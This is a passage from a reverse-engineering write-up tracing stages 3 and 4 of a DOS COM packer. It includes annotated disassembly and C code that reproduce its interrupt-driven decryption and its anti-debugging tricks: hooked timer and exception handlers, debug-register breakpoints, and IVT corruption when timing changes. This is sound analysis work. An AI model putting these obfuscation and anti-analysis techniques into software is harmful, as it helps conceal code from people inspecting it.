     0000:0806 fb            sti                            ; Enable ext. interrupts
     0000:0807 8bec          mov bp, sp                     ; bp = sp
     0000:0809 8bc6          mov ax, si                     ; ax = 0x762
     0000:080b 054b01        add ax, 0x14b                  ; ax = 0x8ad
     0000:080e 894600        mov word [bp], ax              ; Set top of stack to 0x8ad
.--- 0000:0811 eb0a          jmp 0x81d
:    0000:0813 90            nop
`--> 0000:081d b020          mov al, 0x20                   ; PIC End Of Interrupt command
     0000:081f e620          out 0x20, al
     0000:0821 cf            iret                           ; Return from ISR


;; Pop ip, cs, eflags pushed by the cpu at start of ISR
;; Execution continues at cs:08ad


This is the stage 3 decryption loop. It is surprisingly simple, but the loop that carries it out is concealed. It’s done by 
hooking the programmable timer interrupt. This interrupt handler will execute every time the timer ticks. The interrupt 
handler will load di with the si+0x494 value (ciphertext pointer). Then it compares it with the pointer to the end of 
stage 3 ciphertext (which is at the start of the stage 2 key LUT). If it’s not equal, the ciphertext is not fully decrypted 
and the ISR decrypts the next byte by xoring it with 0x01. The ciphertext pointer is increased and the service routine 
is finished (PIC signalled, iret executed). 


The C code that I used to simulate stage 3 and prepare a memory image of stage 4 code looks like this:


uint8_t *ciphertext = memory + 0x832;

do {
    *ciphertext ^= 0x01;
    ciphertext++;
} while (ciphertext != memory + 0x9f4);


As I said, the complexity lies within the implementation using INT6 and INT8.


This loop will decrypt memory from 0x842 to 0xa04. Between the interrupts, the CPU will be busy executing the
invalid instruction handler caused by the invalid instructions at 822. The xor value is 1 because 0x822 is within the
area being decrypted by this stage. The decrypted value for ff is fe, which also happens to be an invalid instruction.
This way the #UD handler will keep looping the CPU even after the bytes at 0x822 are decrypted.


After the decryption is done, the ciphertext pointer (di) matches the end pointer (ax) and the jump at 7f0 will not be 
taken. The interrupt routine will restore the original timer interrupt routine address, edit the saved ip on the stack to 
point to stage 4 entry point, and then jump there using iret. Stage 4 entry is at cs:08ad. 
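

Stripped of the interrupt machinery, each timer tick does one step of the following loop. This is a sketch against a flat memory image using the in-memory addresses from the handler listing (0x842 as the start, 0xa04 as the end); the function and parameter names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* One call performs what the hooked ISR does over many timer ticks:
   XOR every byte in [ptr, end) with 0x01. */
static void stage3_decrypt(uint8_t *memory, uint16_t ptr, uint16_t end)
{
    assert(ptr <= end);
    while (ptr != end) {        /* cmp di, ax / jne 0x814 */
        memory[ptr] ^= 0x01;    /* xor byte [di], 1 */
        ptr++;                  /* inc word [si + 0x494] */
    }
}
```

A call like stage3_decrypt(memory, 0x842, 0xa04) leaves the byte at 0xa04 alone, because the end pointer is exclusive. An 0xff byte inside the range becomes 0xfe, the same ff to fe flip mentioned above.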


Here is the full stage 3 code as decrypted by stage 2. 


; Int 1 at 70e is still active - trap flag is set
; --- stage 3 entry point


    0000:0749 fa            cli                            ; Disable external interrupts
    0000:074a 60            pushaw
    0000:074b 1e            push ds
    0000:074c 06            push es
    0000:074d 6a00          push 0
;; stack = 00 00 00 01 00 01 00 01 00 01 bpL bpH spL spH 00 00 dl dh ?? ch 00 00
    0000:074f 1f            pop ds                         ; ds = 0000;
    0000:0750 9c            pushf                          ; stack = flL flH 00 01...
    0000:0751 58            pop ax                         ; ax = flags ; stack = 00 01 00 01..
    0000:0752 f7d0          not ax                         ; ax = ~flags
    0000:0754 eb01          jmp 0x757                      ; Not a jump to next instruction (eb00),
                                                           ; it skips one byte (eb01) instead!
    0000:0756 9a25000103    lcall 0x301:0x25               ; Decoy
    0000:075b e0a1          loopne 0x6fe                   ; Decoy
    0000:075d 2000          and byte [bx + si], al         ; Decoy
;; This is what the disassembler produces when started at the correct address (0757)
    0000:0757 250001        and ax, 0x100                  ; ax = 0x100 if TF=0, 0x0 if TF=1
    0000:075a 03e0          add sp, ax                     ; Roll stack back 0x100 if trap
                                                           ; flag was unset at 750
    0000:075c a12000        mov ax, word [0x20]            ; Load offset address
    0000:075f e80000        call 0x762
    0000:0762 5e            pop si                         ; si = 0x762
    0000:0763 2e89849004    mov word cs:[si + 0x490], ax   ; Save offset address
    0000:0768 a12200        mov ax, word [0x22]            ; Load segment address
    0000:076b 2e89849204    mov word cs:[si + 0x492], ax   ; Save segment address
    0000:0770 8bc6          mov ax, si                     ; ax = si
    0000:0772 50            push ax
    0000:0773 058200        add ax, 0x82                   ; ax = 7e4
    0000:0776 a32000        mov word [0x20], ax
    0000:0779 8c0e2200      mov word [0x22], cs            ; Set cs:07e4 as INT8
;; Check for FPU, crash if it's not there.
    0000:077d e540          in ax, 0x40                    ; Load timer count
    0000:077f a31c00        mov word [0x1c], ax            ; Set offset
    0000:0782 e540          in ax, 0x40
    0000:0784 a31e00        mov word [0x1e], ax            ; Set segment
    0000:0787 d9da          fnop                           ; Trigger fault
    0000:0789 58            pop ax                         ; Restore ax = 0x762
    0000:078a 50            push ax                        ; stack = 62 07 00 ...
    0000:078b 05d400        add ax, 0xd4                   ; ax = 0x836
    0000:078e a31800        mov word [0x18], ax
    0000:0791 8c0e1a00      mov word [0x1a], cs            ; Set INT6 to cs:0836
    0000:0795 9c            pushf
    0000:0796 58            pop ax
    0000:0797 25fffe        and ax, 0xfeff
    0000:079a 50            push ax
    0000:079b 9d            popf                           ; Clear trap flag
    0000:079c 58            pop ax                         ; ax = 0x762
    0000:079d 053701        add ax, 0x137                  ; ax = 0x899
    0000:07a0 a30400        mov word [4], ax
    0000:07a3 8c0e0600      mov word [6], cs               ; Set cs:0899 as INT1
;; Get RTC time and save second count
    0000:07a7 b402          mov ah, 2
    0000:07a9 cd1a          int 0x1a                       ; INT 1A, AH=0x02: get RTC time
    0000:07ab 52            push dx                        ; Push seconds (dh) + DST flag (dl)
;; Reprogram PIT channel 1
    0000:07ac b0b6          mov al, 0xb6                   ; al = 0xb6 = 0b10110110
    0000:07ae e643          out 0x43, al                   ; Set PIT: ch1, access lo/hi,
    0000:07b0 b002          mov al, 2                      ; mode 2, 16b binary mode
    0000:07b2 e640          out 0x40, al
    0000:07b4 e640          out 0x40, al                   ; Set 0x0202 as timer 0 reload value
;; The program changes timer 1 mode but writes timer 0 value!
    0000:07b6 0f20c0        mov eax, cr0                   ; Mangle cr0 through dr1
    0000:07b9 0f23c8        mov dr1, eax                   ; (this does not change cr0)
    0000:07bc 0f21cb        mov ebx, dr1
    0000:07bf 0f22c3        mov cr0, ebx
;; Get RTC time again and save second count
    0000:07c2 b402          mov ah, 2
    0000:07c4 cd1a          int 0x1a                       ; INT 1A, AH=0x02: get RTC time
    0000:07c6 58            pop ax                         ; ax = previous second count (ah)
                                                           ; and dst flag (al)
    0000:07c7 2af4          sub dh, ah                     ; Subtract old seconds count
;; Rewriting the IVT. If the seconds count changed between the RTC reads at 7a9 and 7c4,
;; then dh is non zero and every third byte at the start of the IVT will be corrupted.
;; Mind you, ds is still 0000
    0000:07c9 b98400        mov cx, 0x84                   ; cx = 0x84
    0000:07cc 33ff          xor di, di                     ; di = 0
.-> 0000:07ce 3035          xor byte [di], dh              ; 0000:0000 ^= dh
:   0000:07d0 83c703        add di, 3                      ; di += 3
`-- 0000:07d3 e2f9          loop 0x7ce                     ; Loop
    0000:07d5 0e            push cs
    0000:07d6 1f            pop ds                         ; ds = cs
    0000:07d7 8bc6          mov ax, si                     ; ax = 0x762
    0000:07d9 05e000        add ax, 0xe0                   ; ax = 0x842
    0000:07dc 89849404      mov word [si + 0x494], ax      ; Save 0x842 to cs:0bf6
    0000:07e0 fb            sti                            ; Enable ext. interrupts
    0000:07e1 eb3f          jmp 0x822                      ; Jump to invalid insns


Stage 4


The entry point is at 08ad. The stack state is the same as it was at the stage 3 entry point. The first instruction is a
subroutine call, one of the few call instructions that actually call a function instead of being used for position
independent code (the previous one was in stage 2).


0000:08ad e8caff        call 0x87a            ; Call subroutine at 87a

0000:087a 6a00          push 0
0000:087c 1f            pop ds                ; ds = 0000
0000:087d c536a000      lds si, [0xa0]
;; si = [0000:00a0], ds = [0000:00a2]
;; load ds:si with segment:offset from 0xa0, INT28 handler (DOS Idle Interrupt)
0000:0881 ad            lodsw ax, word [si]   ; ax = ds:si, si += 2
0000:0882 3d9cfb        cmp ax, 0xfb9c
0000:0885 750c          jne 0x893
0000:0887 ad            lodsw ax, word [si]
0000:0888 3d3d55        cmp ax, 0x553d
0000:088b 7506          jne 0x893
0000:088d ad            lodsw ax, word [si]
0000:088e 3d2d75        cmp ax, 0x752d
0000:0891 7401          je 0x894
0000:0893 c3            ret                   ; Return from call
0000:0894 ea0000ffff    ljmp 0xffff:0         ; Invalid address


The function loads the address of INT 28h handler into ds:si and then loads and compares three words starting at 
that address. If the words do not match the values compared, the function returns normally. If all three words match, 
then the function executes a long jump into oblivion. 


The comparison values make up a piece of x86 code listed below: 


9c        pushf
fb        sti
3d552d    cmp ax, 0x2d55
752?      jne ??


INT 28h is the DOS idle interrupt. The code that the function compares against looks like valid code for a start of an 
INT service handler. Perhaps it’s installed by some debugger or other tool that this program is supposed to protect 
against? 
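

If you want to test a dumped INT 28h handler against this signature yourself, a sketch like the one below will do. It reassembles the three little-endian words exactly as lodsw would and compares them with the constants from the listing. The function name is an assumption of this example, not something taken from the sample.

```c
#include <assert.h>
#include <stdint.h>

/* Returns 1 if the first six bytes of `handler` match the three words
   the stage 4 check compares against (0xfb9c, 0x553d, 0x752d), else 0. */
static int matches_int28_signature(const uint8_t *handler)
{
    static const uint16_t words[3] = { 0xfb9c, 0x553d, 0x752d };

    for (int i = 0; i < 3; i++) {
        /* lodsw: low byte first, then high byte */
        uint16_t w = (uint16_t)(handler[2 * i] | (handler[2 * i + 1] << 8));
        if (w != words[i])
            return 0;
    }
    return 1;
}
```

In byte order the signature is 9c fb 3d 55 2d 75, which is the pushf / sti / cmp ax, 0x2d55 / jne sequence shown above.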


After the check function returns, the code restores es, ds and all general purpose registers from stack, then 
immediately saves them back. 


0000:08b0 07          pop es           ; es = 0100 (cs)
0000:08b1 1f          pop ds           ; ds = 0100 (cs)
0000:08b2 61          popaw
0000:08b3 60          pushaw
0000:08b4 1e          push ds
0000:08b5 06          push es


The register contents at this point are listed below:


ax = 0000    bx = 0000    cx = xx??
dx = 0ac1    ds = 0100    es = 0100
di = 0100    si = 0100    bp = sp + 6


Then the code sets the PIT’s channel 1 reload value to ffff. On older machines PIT channel 1 was used for DRAM 
refresh. 


0000:08b6 b0b6        mov al, 0xb6
0000:08b8 e643        out 0x43, al     ; PIT command b6: ch1,
0000:08ba b0ff        mov al, 0xff     ; access lo/hi, mode 2, 16 bit
0000:08bc e640        out 0x40, al
0000:08be e640        out 0x40, al     ; Load 0xffff to PIT ch 1.


Next the code checks the DOS version, and exits cleanly to DOS if it's below major version 2.


0000:08c0 b430        mov ah, 0x30     ; INT 21h, ah=0x30:
0000:08c2 cd21        int 0x21         ; Get DOS version
0000:08c4 3c02        cmp al, 2        ; Compare maj version with 2
0000:08c6 7305        jae 0x8cd        ; Jump above or equal
0000:08c8 33c0        xor ax, ax       ; ax = 0
0000:08ca 06          push es          ; es = cs
0000:08cb 50          push ax
0000:08cc cb          retf             ; Pull cs:0000 and jump there


The exit is done by jumping to cs:0000, which is the very beginning of the Program Segment Prefix. To maintain
compatibility with CP/M, DOS puts an exit vector there (an INT 20h instruction). It's one of the ways to exit to DOS
cleanly.


0000:08cd b430        mov ah, 0x30
0000:08cf cd21        int 0x21         ; Get DOS version again


If the DOS major version is at least 2, the code goes on. INT 21h (ah=0x30) is executed again, but the result is
discarded. bp and bx are loaded with two pointers from the PSP, and di and cx are loaded with some constants. If you
look up the ASCII values of the constants, di:cx will read “SUCK”.


;; PSP:02 segment of first byte beyond memory allocated to program
0000:08d1 8b2e0200    mov bp, word [2]      ; bp = *(0100:0002)
;; PSP:2c DOS 2+ environment for process
0000:08d5 8b1e2c00    mov bx, word [0x2c]   ; bx = *(0100:002c)

0000:08d9 bf5553      mov di, 0x5355        ; di = 0x5355 “SU”
0000:08dc b94b43      mov cx, 0x434b        ; cx = 0x434b “CK”


Does the author tell us to “SUCK” di:cx here? 
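

If you don't feel like reaching for an ASCII table, the constants can be decoded with a few lines of C. This is only a convenience sketch and the helper name is made up. It reads each register high byte first, which is how the values appear when written as hex numbers.

```c
#include <assert.h>
#include <stdint.h>

/* Writes the two register values as four ASCII characters, high byte
   first, followed by a terminating NUL. */
static void regs_to_text(uint16_t di, uint16_t cx, char out[5])
{
    out[0] = (char)(di >> 8);
    out[1] = (char)(di & 0xff);
    out[2] = (char)(cx >> 8);
    out[3] = (char)(cx & 0xff);
    out[4] = '\0';
}
```

Calling regs_to_text(0x5355, 0x434b, buf) fills buf with "SUCK". Note that the immediates are stored little-endian in the instruction stream (bf 55 53 and b9 4b 43), so a raw hex dump of the file shows "US" and "KC" instead.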


Whatever the aim is, DOS version is requested a third time, then compared with 2 again and the result is discarded 
(the jump continues execution the same in either case). Some values are loaded into registers, the constants are 
loaded again. 


0000:08df b430        mov ah, 0x30             ; Get DOS version (3rd time)
0000:08e1 cd21        int 0x21
0000:08e3 3c02        cmp al, 2                ; Either case continues
0000:08e5 7300        jae 0x8e7                ; code execution.
0000:08e7 33c0        xor ax, ax
0000:08e9 bf0000      mov di, 0
0000:08ec 8b00        mov ax, word [bx + si]
0000:08ee 90          nop
0000:08ef 2bf7        sub si, di
0000:08f1 bf5553      mov di, 0x5355           ; SUCK again
0000:08f4 b94b43      mov cx, 0x434b


Now the interesting part starts. We have more PIC. First, a pointer to a storage area at the end of the binary is 
calculated, and a value of ffff is loaded there: 


0000:08f7 e80000        call 0x8fa
0000:08fa 5e            pop si                     ; si = 0x8fa
0000:08fb 81c6fe02      add si, 0x2fe              ; si = 0xbf8
0000:08ff 2ec704ffff    mov word cs:[si], 0xffff   ; cs:0bf8 = 0xffff


Then there is another “call; pop si” sequence and a pointer to the beginning of what stage 3 decrypted is calculated 
in two steps. 


0000:0904 e80000 call 0x907 ;
0000:0907 5e pop si ; si = 0x907
;; si = 0x6be now points at start of what stage 1 decrypted (cs has changed)
0000:0908 81ee4902 sub si, 0x249 ; si = 0x6be
0000:090c 1e push ds ; Save ds. stack = 01 00...
0000:090d 6a00 push 0 ;
0000:090f 1f pop ds ; ds = 0000
0000:0910 8bc6 mov ax, si ; ax = 0x6be
;; ax = 0x842 points at start of what stage 3 decrypted (cs has changed)
0000:0912 058401 add ax, 0x184 ; ax = 0x842


Accumulator ax now contains the pointer to the beginning of decrypted stage 4 code. In between the steps, ds is 
zeroed. Then, two interrupt routine handlers are installed: 


0000:0915 a30c00 mov word [0xc], ax ;
0000:0918 8c0e0e00 mov word [0xe], cs ; Set INT3 to cs:0842
0000:091c 8bc6 mov ax, si ; ax = 0x6be
0000:091e 056a01 add ax, 0x16a ; ax = 0x828
0000:0921 a31800 mov word [0x18], ax ;
0000:0924 8c0e1a00 mov word [0x1a], cs ; Set INT6 to cs:0828
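
The writes above rely on the layout of the real-mode interrupt vector table: vector n occupies four bytes starting at 0000:(4*n), with the handler offset in the first word and the handler segment in the second. A minimal sketch of that arithmetic follows; the function names are made up for illustration and do not come from the packer.

```c
#include <stdint.h>

/* Real-mode IVT: vector n lives at 0000:(4*n).
 * The first word holds the handler offset, the second its segment.
 * Both helper names are hypothetical. */
uint16_t ivt_offset_addr(uint8_t vector)
{
    return (uint16_t)(vector * 4u);
}

uint16_t ivt_segment_addr(uint8_t vector)
{
    return (uint16_t)(vector * 4u + 2u);
}
```

For INT3 this yields 0x0c and 0x0e, and for INT6 0x18 and 0x1a, which are the four addresses written by the code at 915 through 924.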


A word at 0000:0270 is set to ea 00 (ea at 270, 00 at 271). Then a pointer is calculated and saved at 271, along with 
the code segment at 273. 


0000:0928 c7067002ea00 mov word [0x270], 0xea ; Set 0000:0270 to ea 00
0000:092e 8bc6 mov ax, si ; ax = 0x6be
0000:0930 05f302 add ax, 0x2f3 ; ax = 0x9b1
0000:0933 a37102 mov word [0x271], ax ; Set 0000:0271 = ax
0000:0936 8c0e7302 mov word [0x273], cs ; Set 0000:0273 = cs


If you noticed that this together forms the long jump instruction with an immediate operand (opcode ea), then you are
right, because that’s exactly what it is, as I will show in a moment. On my test DOS 6.22 VM, the area at 0000:0270
belongs to unused interrupt vectors. (The segment:offset pointers stored there all point to an iret.)
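
To make the byte layout concrete, here is a small sketch of how a 16-bit far jump is encoded: the opcode ea is followed by the offset word and then the segment word, both little-endian. The function name is hypothetical, and the segment used in the usage note is a placeholder, since the real value of cs depends on where DOS loaded the file.

```c
#include <stdint.h>

/* Encode a real-mode far jump (opcode 0xEA, ptr16:16) into out[0..4].
 * The offset comes first, then the segment, each stored little-endian.
 * The function name is an illustration, not part of the packer. */
void encode_far_jmp(uint8_t out[5], uint16_t segment, uint16_t offset)
{
    out[0] = 0xEA;
    out[1] = (uint8_t)(offset & 0xFF);
    out[2] = (uint8_t)(offset >> 8);
    out[3] = (uint8_t)(segment & 0xFF);
    out[4] = (uint8_t)(segment >> 8);
}
```

Calling encode_far_jmp(buf, 0x1234, 0x09b1) produces ea b1 09 34 12. The packer reaches the same layout in three writes: ea 00 at 270, the offset at 271 (overwriting the 00), and cs at 273.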


The code then saves the current si, and loads the current ip into si again, then calculates a pointer. The pointer is left 
in si. 


0000:093a 56 push si ; stack = be 06
0000:093b e80000 call 0x93e ;
0000:093e 5e pop si ; si = 0x93e
0000:093f 56 push si ; stack = 3e 09 be 06
0000:0940 83c61d add si, 0x1d ; si = 0x95b
0000:0943 90 nop


Then the program does a very interesting trick: 


0000:0944 66b84de80f00 mov eax, 0xfe84d ;
0000:094a 0f23c0 mov dr0, eax ; Set 0xfe84d as breakpoint 0
0000:094d 66b803000000 mov eax, 3 ;
0000:0953 0f23f8 mov dr7, eax ; Set breakpoint 0 conditions
0000:0956 ea4de800f0 ljmp 0xf000:0xe84d ; Jump to lin. address = 000f e84d


First, a constant value is loaded into dr0. Then, dr7, which is the control register for the debug core, enables this 
breakpoint to trigger on instruction execution. Finally, a long jump is executed to the address that was just set as the 
breakpoint address. This, of course, triggers the debug interrupt handler. 
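
The value 3 written to dr7 can be derived from the register layout in the Intel manuals: bits 2n and 2n+1 are the local and global enable bits for breakpoint n, and the four-bit field starting at bit 16+4n holds its R/W and LEN settings, where zero means "break on instruction execution". The helper below is only a sketch with a made-up name.

```c
#include <stdint.h>

/* Build a DR7 value that arms one hardware breakpoint (index 0..3)
 * as an execution breakpoint.
 * Bits 2n and 2n+1 are the local/global enable bits (Ln, Gn).
 * The 4-bit field at bit 16+4n holds R/Wn (low 2 bits) and LENn
 * (high 2 bits); both must be 00 for instruction execution.
 * The function name is hypothetical. */
uint32_t dr7_exec_breakpoint(unsigned index)
{
    uint32_t dr7 = 0;
    dr7 |= (uint32_t)3 << (index * 2);                /* set Ln and Gn */
    dr7 &= ~((uint32_t)0xF << (16 + index * 4));      /* R/Wn = 00, LENn = 00 */
    return dr7;
}
```

For breakpoint 0 this gives 3, the constant loaded at 94d.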


I have to point out that this looked fairly obvious. Due to how segmented memory works, there are a lot of
segment:offset combinations that point to the same linear address, so a jump to, e.g., fd73:111d would also trigger
the breakpoint, while being a bit more covert about it.
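
The aliasing is easy to check by hand, since a real-mode linear address is segment * 16 + offset. The sketch below does the computation; the function name is made up, and the 20-bit mask (address wraparound with the A20 line disabled) is an assumption of this sketch.

```c
#include <stdint.h>

/* Real-mode address translation: linear = segment * 16 + offset.
 * The 20-bit mask models wraparound with A20 disabled; that is an
 * assumption of this sketch, not something the packer depends on. */
uint32_t linear_address(uint16_t segment, uint16_t offset)
{
    return (((uint32_t)segment << 4) + offset) & 0xFFFFFu;
}
```

Both f000:e84d and fd73:111d map to 0xfe84d, the address stored in dr0.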


The long jump at 956 triggers the debug interrupt (INT1), and the execution continues inside its handler at 899. INT1
was set in the previous stage at 7a0. The code is now decrypted and makes sense:


;; INT1 handler. ISR stack words are = ip cs flags
0000:0899 8bec mov bp, sp ; bp = sp
0000:089b 897600 mov word [bp], si ; Set return ip to si
0000:089e 8c4e02 mov word [bp + 2], cs ; Set return segment to cs
0000:08a1 6633c0 xor eax, eax ; Clear eax
0000:08a4 0f23f8 mov dr7, eax ; Clear all bp conditions
0000:08a7 0f23c0 mov dr0, eax ; Clear dr0
0000:08aa cf iret ; Continue execution at cs:si


The handler clears the breakpoint, then resumes execution at cs:si by manipulating the return address on its stack.
The source index register (si) was set to 0x95b by the code at 940, so that is where the execution will continue. It is
also the instruction immediately following that long jump. Let’s follow the code.


;; stack grew by 4 bytes: 3e 09 be 06
0000:095b 5e pop si ; si = 0x93e
0000:095c 81c66dff add si, 0xff6d ; si = 0x08ab (overflow)
0000:0960 6a00 push 0 ;
0000:0962 1f pop ds ;
0000:0963 89360400 mov word [4], si ;
0000:0967 8c0e0600 mov word [6], cs ; Set INT 1 handler to cs:08ab


Register si is again used to calculate a code pointer and set it as an interrupt handler (this has been a pattern, 
obviously). Next up we have some more register shuffling: 


0000:096b 5e pop si ; si = 0x6be
0000:096c 1f pop ds ; ds = 0x0100
0000:096d 8cd8 mov ax, ds ; ax = 0x0100
0000:096f 051000 add ax, 0x10 ; ax = 0x0110
0000:0972 8ed8 mov ds, ax ; ds = 0x0110
0000:0974 1e push ds ;
0000:0975 07 pop es ; es = 0x0110
0000:0976 8bd6 mov dx, si ; dx = 0x08ab
0000:0978 bd0000 mov bp, 0 ; bp = 0
0000:097b fc cld ; Clear direction flag


Note that both ds and es were set to the code segment offset by 0x10. This effectively makes ds:0000 point to the
beginning of the program (offset 0x100 in the load segment). Remember that the first 0x100 bytes in the program
load segment are allocated for the PSP.


The above code fragment sets up registers for more string operations (lods/stos). ds and es are set to meaningful
values, and finally, the direction flag is cleared. A clear direction flag means the lods/stos operations will increment
the si/di registers.


Then there is some dummy code for obfuscation (these instructions do not do anything meaningful). Two more
constants are loaded into registers: cl, which used to carry the key byte, is loaded with an initial value of 0x68, and
bx is loaded with 0x537, which looks very much like the length of the original binary. Recall that the very first
instruction of the COM file is a jump to 0x63a, or 0x537+0x100+0x03 (load offset + length of first jump).


    0000:097c 9b wait ; Wait for BUSY# to go high
    0000:097d dbe3 fninit ; Initialize FPU
    0000:097f b168 mov cl, 0x68 ; cl = 0x68
    0000:0981 0bed or bp, bp ; Set zero flag (ZF=1)
.-- 0000:0983 7441 je 0x9c6 ; Jump is taken
'-> 0000:09c6 bb3705 mov bx, 0x537 ; bx = 0x537


Then we have more register setup related to the string instructions. The source index is set to 3, and the destination
index to 0. It should now be clear that this stage will copy (and decrypt in the process) the original program code,
moving it from offset 0x103 (ds:si) to 0x100 (es:di).


.--  0000:09c9 ebbc jmp 0x987
:    0000:0985 33db xor bx, bx
'->  0000:0987 be0300 mov si, 3 ; si = 0x03
     0000:098a bf0000 mov di, 0 ; di = 0x00
     ;; ds:si points at the first byte of the executable
     ;; (after the jmp 0x64a at the very beginning)
(*)->0000:098d ac lodsb al, byte [si] ; al = ds:si, al = 0x81. si++
     0000:098e d2c0 rol al, cl ; Rotate al
     0000:0990 32c1 xor al, cl ; Xor al with 0x68


The first byte of the payload is loaded into al, then al is rotated 0x68 times. The rotation does not change al because
0x68 is a multiple of 8. Next, al is xored with the value in cl, which is 0x68 at this point (0x81 xor 0x68 = 0xe9). This
is the first part of the decryption.


However, after this snippet there is a very unusual block of instructions. I will list it here and then go through them
one by one.


0000:0992 cc int3 ; Call INT3 handler (cs:0832)
0000:0993 f1 int1 ; Call INT1 handler (cs:08ab)
0000:0994 ff invalid ; Trigger INT6 handler
0000:0995 ff invalid
0000:0996 d9d0 fnop ; INT6 handler returns here
0000:0998 d9d0 fnop
0000:099a 0f23c8 mov dr1, eax ; Scrap the debug registers
0000:099d d9d0 fnop ; just in case someone's watching
0000:099f 0f23d8 mov dr3, eax ;
0000:09a2 0f20c0 mov eax, cr0 ;
0000:09a5 d9d0 fnop ;
0000:09a7 0f22c0 mov cr0, eax ; Do funny stuff with cr0
0000:09aa d9d0 fnop
0000:09ac ea00002700 ljmp 0x27:0 ; Jump to linear address 0000 0270


Let’s trace what this code fragment will execute. First, let’s take a look at cs:0842 which is the current INT3 interrupt 
handler... 


;; INT3 handler
;; This procedure decrypts the final (?) stage of the binary
;; al - ciphertext byte
;; it also reads the initial storage area value from dx
;; Saved cs:ip points to next instruction (cs:0993)
;; This procedure leaves ax (ah,al) clobbered
;; Register state at the end:
;; ax = 01e9
;; al = e9 ah = 01
;; si = 0003 di = 0000 source and destination pointers
;; bx = 0537 size of decrypted binary?
;; dx = 08ab cl = 68
0000:0842 56 push si ;
0000:0843 1e push ds ;
0000:0844 51 push cx ; Save si, ds, cx
0000:0845 0e push cs ;
0000:0846 1f pop ds ; ds = cs
0000:0847 6650 push eax ; Save eax
0000:0849 fc cld ; Clear direction flag
0000:084a 0f20c0 mov eax, cr0 ;
0000:084d 0f22c0 mov cr0, eax ; Do nothing with cr0
0000:0850 6658 pop eax ; Restore eax
0000:0852 e80000 call 0x855 ;
0000:0855 5e pop si ; si = 0x855
0000:0856 50 push ax ; stack words = ax cx ds si
0000:0857 8bc6 mov ax, si ; ax = 0x855
0000:0859 81c6a303 add si, 0x3a3 ; si = 0xbf8
0000:085d 057901 add ax, 0x179 ; ax = 0x9ce, si + 0x179
0000:0860 3904 cmp word [si], ax ; Compare 9ce and *(cs:0bf8)
0000:0862 58 pop ax ; Restore ax
0000:0863 7205 jb 0x86a ; Jump if below (CF=1)
0000:0865 0f23d2 mov dr2, edx ; Write dx to dr2
0000:0868 8914 mov word [si], dx ; Load dx (8ab) to cs:0bf8
0000:086a ff04 inc word [si] ; Increase the counter (0xbf8)
0000:086c 8b34 mov si, word [si] ; Load counter to si
0000:086e 4e dec si ; Decrement si
0000:086f 8ae0 mov ah, al ; ah = al
0000:0871 ac lodsb al, byte [si] ; Load second ciphertext
0000:0872 32e0 xor ah, al ; ah ^= al -- decrypt
0000:0874 8ac4 mov al, ah ; Move cleartext byte to al
0000:0876 59 pop cx ;
0000:0877 1f pop ds ;
0000:0878 5e pop si ; Restore si, ds, cx
0000:0879 cf iret ; Return from interrupt.


In this part, after ax is restored at 862, al contains the result of the xor at 990. Then al is saved into ah. si is
overwritten with the counter from the storage area and then used to load al with the new value (lodsb). ah is xored
with the new al value, and the result is moved back to al. This is the second XOR operation that completes the
decryption. Pointers to two ciphertext values have been incremented. The pointer used for the second al load needs
to be incremented manually (inc m16 at 86a).


After the INT3 handler ends, the CPU will execute the int1 instruction at 993 and execution will continue at cs:08ab,
which is the current INT1 handler (set at 967)...


0000:08ab aa stosb byte es:[di], al ; Save al to es:di, di++
0000:08ac cf iret ; Return from interrupt


This handler saves the decrypted value in al to es:di. This concludes processing 1 byte of the ciphertext.
The encryption algorithm here is the most sophisticated so far. It is based on two XORs, but this time, the ciphertext
is xored with its previous bytes in order to avoid using a constant value (stage 3) or a (limited length) key lookup
table, as was the case in stage 2. Additionally, the byte is rotated and pre-xored with a rolling key.


This is a simple stream cipher, but the implementation is intentionally obfuscated. 
I’ve drawn out the schematic of the cipher below (@ sign denotes the instruction address): 


[Schematic: the ciphertext byte at [si] is loaded (@98d), rotated left by cl (@98e) and xored with cl (@990). The
result is xored (@872) with the byte loaded through [cntr] (@871) and stored at [di] (@8ab). cl is incremented every
round (cl++), and the loop repeats while bx-- != 0.]


Alternatively, to use cryptographic notation: 


m(n) = rol(c(n+3), cl(n)) xor cl(n) xor c(n-1);
cl(n) = (0x68 + n) & 0xFF;
m - message, c - ciphertext; m(n) - nth message symbol (byte), and so on.


Here’s the C code that I used:


do {
    al = memory[si++];
    al = rol(al, cl);
    al = al ^ cl;

    counter++;
    ah = al;
    al = memory[counter-1];
    ah = ah ^ al;
    al = ah;

    memory[di++] = al;

    cl++;
    bx--;
} while (bx != 0);


And my implementation of the rol r/m8, cl operation:


unsigned char rol(unsigned char rm8, unsigned char cl) {
    unsigned int tmp = rm8 | rm8 << 8;
    tmp >>= (8 - cl % 8);
    return tmp & 0xff;
}
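
For readers who want to experiment, the per-byte steps traced above can be collected into one self-contained routine. This is only a sketch under stated assumptions: the names rol8 and stage4_decrypt are made up, the second byte stream (the one the INT3 handler reads through the counter) is passed in as a separate buffer, and source and destination do not overlap, whereas the packer works in place.

```c
#include <stddef.h>
#include <stdint.h>

/* Rotate an 8-bit value left. Only the count modulo 8 matters. */
uint8_t rol8(uint8_t value, uint8_t count)
{
    unsigned n = count % 8u;
    return (uint8_t)((value << n) | (value >> ((8u - n) % 8u)));
}

/* Decrypt len bytes (hypothetical helper, not the author's code).
 * src - primary ciphertext stream (read through si in the listing)
 * key - second stream (read through the counter in the INT3 handler)
 * cl0 - initial value of cl, 0x68 in the listing */
void stage4_decrypt(const uint8_t *src, const uint8_t *key,
                    uint8_t *dst, size_t len, uint8_t cl0)
{
    uint8_t cl = cl0;
    for (size_t i = 0; i < len; i++) {
        uint8_t al = rol8(src[i], cl); /* rol al, cl at 98e */
        al ^= cl;                      /* xor al, cl at 990 */
        al ^= key[i];                  /* xor ah, al at 872 */
        dst[i] = al;                   /* stosb at 8ab      */
        cl++;                          /* inc cl at 824     */
    }
}
```

With cl0 = 0x68, a first ciphertext byte of 0x81 and a zero key byte, the first output byte is 0xe9, which matches the al value noted in the INT3 handler listing.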


After the INT1 handler ends, the execution continues at the two invalid instructions (cs:0994), which causes the INT6
(#UD) handler to be executed (cs:0818):


0000:0818 0f23d6 mov dr2, esi ;
0000:081b 0f23c6 mov dr0, esi ;
0000:081e 0f23ce mov dr1, esi ;
0000:0821 0f23de mov dr3, esi ; Set all breakpoints to esi
0000:0824 fec1 inc cl ; Increase cl
;; int 6 handler earlier set by code at 77e
0000:0826 0f23d0 mov dr2, eax ; Set dr2 to eax
0000:0829 55 push bp
0000:082a 8bec mov bp, sp
0000:082c 83460202 add word [bp + 2], 2 ; Move the saved ip 2 bytes ahead
0000:0830 5d pop bp
